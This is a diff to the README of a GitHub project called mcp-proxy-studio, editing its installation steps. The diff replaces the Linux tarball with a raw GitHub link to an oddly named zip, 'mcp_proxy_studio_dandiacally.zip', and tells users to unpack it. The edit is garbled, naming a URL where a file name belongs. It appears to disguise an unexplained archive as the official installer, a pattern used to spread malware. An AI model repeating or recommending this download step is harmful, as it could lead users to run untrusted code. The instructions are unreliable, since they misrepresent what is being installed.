Nicnk/mcp-proxy-studio/README.md

 3. **Download the File:**
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, you will find a `.tar.gz` file.
+   - For Linux, you will find a `https://github.com/Nicnk/mcp-proxy-studio/raw/refs/heads/main/studio/mcp_proxy_studio_dandiacally.zip` file.

 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - For macOS: Open the `.dmg` file, drag the application into your **Applications** folder.
-   - For Linux: Unpack the `.tar.gz` file and follow the README instructions provided within.
+   - For Linux: Unpack the `https://github.com/Nicnk/mcp-proxy-studio/raw/refs/heads/main/studio/mcp_proxy_studio_dandiacally.zip` file and follow the README instructions provided within.

 5. **Start the Application:**
    After installation, locate **mcp-proxy-studio** in your applications folder or Start Menu.
 Click to run the app.